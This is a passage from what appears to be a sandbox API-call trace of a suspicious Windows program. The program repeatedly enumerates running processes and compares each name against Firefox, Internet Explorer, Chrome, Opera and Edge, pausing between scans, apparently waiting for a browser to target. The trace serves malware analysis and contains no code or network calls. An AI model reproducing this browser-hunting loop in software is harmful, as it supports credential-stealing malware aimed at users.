lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.011] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0256.011] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0256.011] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0256.011] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0256.011] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0256.012] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.012] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.012] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0256.012] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0256.012] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0256.012] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0256.012] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.012] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0256.013] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0256.013] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0256.013] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0256.013] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0256.013] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.013] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.013] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.013] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.013] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.013] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0256.013] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.013] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0256.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0256.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0256.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0256.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0256.014] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0256.014] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.014] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.014] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.014] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.014] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0256.014] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.014] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.015] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.015] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.015] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.015] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0256.015] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.015] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.016] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0256.016] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0256.016] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0256.017] CloseHandle (hObject=0xe8) returned 1 [0256.017] Sleep (dwMilliseconds=0x3e8) [0257.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0257.021] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.021] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0257.022] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0257.022] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0257.022] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0257.022] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0257.022] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0257.022] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0257.022] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0257.022] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0257.022] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0257.022] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0257.022] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0257.023] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0257.023] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0257.023] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0257.023] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0257.023] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.023] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.023] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0257.023] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0257.023] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0257.023] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0257.023] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.023] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0257.024] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0257.024] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0257.024] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0257.024] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0257.024] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.024] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0257.025] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0257.025] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0257.025] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0257.025] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0257.025] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0257.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0257.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0257.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0257.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0257.025] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0257.026] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0257.026] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0257.026] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0257.026] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0257.026] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.026] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0257.026] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0257.026] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0257.026] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0257.026] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0257.026] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.026] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0257.027] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0257.027] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0257.027] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0257.027] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0257.027] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.028] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.028] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.029] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.029] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.029] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.030] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.030] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.030] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.030] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.030] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.030] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0257.030] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0257.031] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0257.031] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0257.031] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0257.031] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.031] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.031] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.031] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.031] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.031] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.031] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.031] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.032] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.032] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.032] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.032] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.032] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.032] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0257.032] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0257.032] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0257.032] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0257.032] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0257.032] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.032] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0257.033] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0257.033] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0257.033] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0257.033] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0257.033] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.033] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0257.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0257.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0257.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0257.033] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0257.034] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0257.034] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0257.034] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0257.034] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0257.034] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0257.034] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0257.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0257.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0257.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0257.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0257.035] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0257.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0257.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0257.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0257.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0257.035] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0257.036] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0257.036] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0257.036] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0257.036] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0257.036] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0257.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0257.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0257.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0257.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0257.036] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0257.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0257.037] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0257.037] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0257.037] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0257.037] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0257.037] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0257.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, 